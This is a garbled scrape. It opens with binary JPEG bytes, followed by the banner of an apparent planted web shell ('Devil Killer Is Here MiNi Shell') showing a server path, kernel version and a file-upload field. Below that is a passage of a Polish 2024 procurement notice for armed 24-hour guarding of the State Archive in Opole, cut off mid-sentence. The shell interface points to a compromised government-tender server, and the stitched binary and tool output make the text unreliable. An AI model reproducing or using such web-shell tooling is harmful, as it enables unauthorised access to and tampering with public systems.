JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240424/0030010601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Całodobowa ochrona fizyczna osób i mienia wraz z monitorowaniem budynku Archiwum Państwowego w Opolu przy ul. Zamkowej 2 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Archiwum Państwowe w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001152</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zamkowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-016</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@opole.ap.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://opole.ap.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> dzialalność archiwów państwowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Całodobowa ochrona fizyczna osób i mienia wraz z monitorowaniem budynku Archiwum Państwowego w Opolu przy ul. Zamkowej 2 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3f69b03d-021e-11ef-b81b-aebd110f5279</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00300106</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00219561/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Całodobowa ochrona fizyczna osób i mienia wraz z monitorowaniem budynku Archiwum Państwowego w Opolu przy ul. Zamkowej 2</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://opole-ap-gov-pl.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://opole-ap-gov-pl.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej. Prowadzone postępowanie odbywa się za pośrednictwem elektronicznej platformy, dostępnej pod adresem https://opole-ap-gov-pl.logintrade.net , zakładka portal wykonawców.<br/>Składanie ofert, wniosków, zapytań możliwe jest tylko i wyłącznie za pośrednictwem w/w platformy.<br/>Wykonawca zainteresowany udziałem w postępowaniu musi mieć aktywne konto na platformie elektronicznej zlokalizowanej pod adresem https://opole-ap-gov-pl.logintrade.net . W tym celu Wykonawca winien zapoznać się z: <br/>•	Instrukcją obsługi dla Wykonawcy rejestracja na Platformie, <br/>•	Instrukcją obsługi dla Wykonawcy wymagania techniczne, <br/>•	Instrukcją obsługi dla Wykonawcy przetarg nieograniczony,<br/>stanowiącymi odpowiednio Załączniki nr 4a-4c do SWZ i zarejestrować się na portalu. <br/>Zamawiający nie ponosi odpowiedzialności za złożenie przez Wykonawcę oferty w sposób niezgodny z warunkami korzystania z platformy elektronicznej https://opole-ap-gov-pl.logintrade.net . W sytuacji awarii, błędów lub niedostępności platformy elektronicznej https://opole-ap-gov-pl.logintrade.net , uniemożliwiających komunikację Wykonawcy i Zamawiającego oraz możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów oraz oświadczeń poprzez platformę, Zamawiający dopuszcza komunikację oraz ich przesyłanie za pomocą poczty elektronicznej na adres: zamowienia@opole.ap.gov.pl. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail: zamowienia@opole.ap.gov.pl <br/>W przypadku zaistnienia sytuacji opisanej w rozdz. H pkt 6 SWZ (awaria, błędy lub niedostępność platformy) dokumenty składające się na ofertę – po uprzednim podpisaniu kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym - powinny zostać skompresowane oprogramowaniem „7-ZIP” (Open Source) dostępnym do pobrania w Internecie (www.7-zip.org lub polskojęzycznej https://7-zip.org.pl ). Do kompresji należy użyć bezpiecznego algorytmu szyfrowania AES-256 a także zabezpieczyć hasłem (hasło niesłownikowe, minimum 8 znaków, zawierające litery małe i wielkie, cyfry, znaki specjalne). Docelowym formatem pliku skompresowanego powinien być format 7z lub ZIP. Hasło użyte do zabezpieczenia skompresowanego pliku należy przesłać odrębnym kanałem komunikacyjnym na adres: kancelaria@opole.ap.gov.pl , zaś sam skompresowany plik na adres e-mail: zamowienia@opole.ap.gov.pl.<br/>Oferta powinna być sporządzona w języku polskim, w postaci elektronicznej w formacie danych .doc, .docx, .pdf, .xml, .xlsx, .xls i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub w postaci elektronicznej opatrzonej podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem danych osobowych dotyczących Wykonawcy jest Archiwum Państwowe w Opolu, ul. Zamkowa 2, 45-016 Opole.<br/>2.	W sprawach związanych z danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, kontakt pisemny za pomocą poczty tradycyjnej na adres Archiwum Państwowego w Opolu; e-mail: iod@opole.ap.gov.pl <br/>3.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Całodobowa ochrona fizyczna osób i mienia wraz z monitorowaniem budynku Archiwum Państwowego w Opolu przy ul. Zamkowej 2”, prowadzonym w trybie podstawowym na podstawie art. 275 pkt. 1 Prawa zamówień publicznych;<br/>4.	Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm.), dalej „PZP”; <br/>5.	Dane mogą być ujawniane Naczelnej Dyrekcji Archiwów Państwowych w celu realizacji zadań ustawowych i statutowych Archiwum, a także naszym podwykonawcom, ale wyłącznie w zakresie świadczonych dla nas usług, w szczególności podmiotom wykonującym usługi hostingowe, serwisowe, doradcze, konsultacyjne, audytowe, pomoc prawną, serwis IT. Dane mogą być również ujawniane w trybie dostępu do informacji publicznej.<br/>6.	Dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego. <br/>7.	Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z PZP.<br/>8.	W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>9.	Administrator informuje, iż Wykonawca posiada:<br/>a.	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>b.	na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>d.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>10.	Wykonawcy nie przysługuje:<br/>a.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAG.261.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest całodobowa stała fizyczna ochrona osób i mienia wraz z monitorowaniem budynku siedziby Archiwum Państwowego w Opolu przy ul. Zamkowej 2 („usługa’) świadczona w zakresie: <br/>•	stałej całodobowej ochrony fizycznej osób i mienia, <br/>•	monitoringu w formie doraźnej zorganizowanej grupy interwencyjnej wraz ze stałym dozorem sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych,<br/>realizowana zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tekst jedn. Dz.U. z 2021 r. poz. 1995) oraz innych aktów prawnych wydanych na jej podstawie i związanych z realizacją usługi w trakcie obowiązywania umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiającemu przysługuje umowne prawo do odstąpienia od niniejszej umowy w razie:<br/>1)	wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy; <br/>2)	braku odpowiednich środków finansowych przyznawanych corocznie w ramach budżetu na sfinansowanie zadania przez dysponenta właściwego stopnia; <br/>3)	ogłoszenia likwidacji lub upadłości firmy Wykonawcy,<br/>4)	utraty przez Wykonawcę koncesji uprawniającej do prowadzenia działalności gospodarczej dotyczącej ochrony osób i mienia, <br/>5)	gdy Wykonawca nie rozpoczął realizacji umowy, bądź zaniechał jej realizacji,<br/>6)	gdy Wykonawca nie posiada wymaganego obowiązkowego ubezpieczenia odpowiedzialności cywilnej przedsiębiorcy wykonującego działalność gospodarczą w zakresie ochrony osób i mienia, <br/>7)	zaistnienia co najmniej dwóch przypadków świadczenia przez Wykonawcę usług z naruszeniem zobowiązań umownych wynikających z treści oferty Wykonawcy, postanowień SWZ lub umowy lub dwóch przypadków naruszenia innych zobowiązań umownych Wykonawcy wynikających z treści oferty Wykonawcy, postanowień SWZ lub umowy. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-08-31 do 2027-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">w przypadku udzielenia, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych, zamówienia polegającego na powtórzeniu podobnych usług lub robót budowlanych, jeżeli takie zamówienie było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Cena - 95% - max. 95 pkt.<br/>b) Dostępność usługi - gwarantowany czas dojazdu grupy interwencyjnej w dzień - 3% - max. 3 pkt<br/>c) Dostępność usługi - gwarantowany czas dojazdu grupy interwencyjnej w nocy - 2% - max. 2 pkt<br/>- obliczone według postanowień rozdziału F pkt 8 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostępność usługi - gwarantowany czas dojazdu grupy interwencyjnej w dzień</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostępność usługi - gwarantowany czas dojazdu grupy interwencyjnej w nocy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się Wykonawcy, którzy:<br/>a)	nie podlegają wykluczeniu (także z uwzględnieniem przepisów rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie /Dz. Urz. UE nr L 229 z 31.7.2014, str. 1/), <br/>b)	prowadzą działalność gospodarczą polegającą na ochronie mienia i osób oraz posiadają ważną odpowiednią koncesję MSWiA uprawniającą Wykonawcę do wykonywania działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej stałej ochrony fizycznej osób i mienia oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych;<br/>c)	posiadają polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności (odpowiedzialność kontraktowa i deliktowa) na kwotę odpowiadającą co najmniej wartości brutto oferty złożonej przez Wykonawcę w niniejszym postępowaniu, a w przypadku wygaśnięcia polisy ubezpieczeniowej, przed terminem zakończenia zawieranej umowy przedłożą nową polisę, aż do zakończenia świadczenia usługi;<br/>d)	wykonali w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał należycie - minimum 2 zadania dotyczące bezpośredniej ochrony fizycznej osób i mienia (w rozumieniu art. 3 pkt 1 lit. a) i lit. b) ustawy z dn. 22 sierpnia 1997 r. o ochronie osób i mienia /tekst jedn. Dz. U. z 2021 r. poz. 1995/), a ochrona dotyczyła obiektów użyteczności publicznej, a w szczególności takich jak: obiekty przeznaczone na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, szkolnictwa wyższego, opieki zdrowotnej oraz innych ogólnodostępnych obiektów przeznaczonych do wykonywania podobnych funkcji w tym także budynków biurowych i socjalnych, o wartości każdego zadania brutto porównywalnej (+/- 30%) z wartością brutto oferty złożonej przez Wykonawcę w niniejszym postępowaniu;<br/>e)	dysponują odpowiednimi zasobami ludzkimi zdolnymi do wykonania zamówienia, mianowicie:<br/>i.	dysponują co najmniej 14 osobami zatrudnionymi na podstawie umowy o pracę w pełnym wymiarze godzin nie mającymi statusu osoby niepełnosprawnej, które:<br/>-	są wpisane na listę kwalifikowanych pracowników ochrony fizycznej zgodnie z ustawą z dnia 22.08.1997r. o ochronie osób i mienia (tekst jedn. Dz.U. z 2021 r. poz. 1995),<br/>-	posiadają legitymację osoby dopuszczonej do posiadania broni oraz dopuszczenie do posługiwania się paralizatorem,<br/>-	pracownicy Grupy Interwencyjnej posiadają poświadczenie bezpieczeństwa lub upoważnienie do dostępu do informacji niejawnych oznaczonych klauzulą „ZASTRZEŻONE&#34;,<br/>-	pracownicy wyznaczeni do ochrony fizycznej obiektu posiadają poświadczenie bezpieczeństwa do dostępu do informacji niejawnych oznaczonych klauzulą „ZASTRZEŻONE&#34;.<br/>ii. dysponują co najmniej 2 osobami przeznaczonymi do przeprowadzenia kontroli nie mającymi statusu osoby niepełnosprawnej, które:<br/>-	są wpisane na listę kwalifikowanych pracowników ochrony fizycznej zgodnie z ustawą z dnia 22.08.1997 r. o ochronie osób i mienia (tekst jedn. Dz.U. z 2021 r. poz. 1995),<br/>-	posiadają legitymację osoby dopuszczonej do posiadania broni lub posługiwania się paralizatorem posiadają poświadczenie bezpieczeństwa lub upoważnienie do dostępu do informacji niejawnych oznaczonych klauzulą „ZASTRZEŻONE&#34;,<br/>iii. posiadają własnego pełnomocnika ds. ochrony informacji niejawnych,<br/>iv.	dysponują minimum 5 osobami (instalatorzy i dozór) wpisanymi na listę kwalifikowanych pracowników zabezpieczenia technicznego, zgodnie z ustawą z dnia 22.08.1997 r. o ochronie osób i mienia (tekst jedn. Dz. U. z 2021 r. poz. 1995) i posiadającymi poświadczenia bezpieczeństwa w zakresie dopuszczenia do informacji niejawnych o klauzuli tajności „ZASTRZEŻONE&#34;.<br/>f)	dysponują co najmniej następującym potencjałem technicznym:<br/>i)	minimum 2 oznakowane samochody na wyposażeniu zmotoryzowanych grup interwencyjnych SUFO z zamontowanymi urządzeniami typu GPS w celu szybkiej lokalizacji obiektów w terenie (Zamawiający nie dopuszcza podwykonawstwa),<br/>ii)	własny system łączności bezprzewodowej w relacji stały posterunek ochrony - patrol,<br/>iii)	własną stację monitorowania i alarmowania SMA, która będzie obejmować swym oddziaływaniem obiekt Archiwum (Zamawiający nie dopuszcza podwykonawstwa),<br/>iv)	dysponują własnym systemem napadowym dla pracowników ochrony;<br/>v)	dysponują i przeznaczą w związku z ochroną obiektów Zamawiającego następujące rodzaje i ilości broni, zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21 października 2011 r. w sprawie zasad uzbrojenia specjalistycznych uzbrojonych formacji ochronnych i warunków przechowywania oraz ewidencjonowania broni i amunicji (tekst jedn. Dz.U. z 2015 poz. 992) - broń palna krótka - 5 szt. + paralizator - 1 szt.<br/>g)	zapoznali się ze szczegółowymi warunkami przetargu zawartymi w Specyfikacji Warunków Zamówienia i przyjmują je bez zastrzeżeń. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych w tym zakresie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	ważna koncesja na prowadzenie działalności gospodarczej świadczenia usług ochrony osób i mienia, zgodnie z ustawą z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (tekst jedn. Dz.U. z 2021 r. 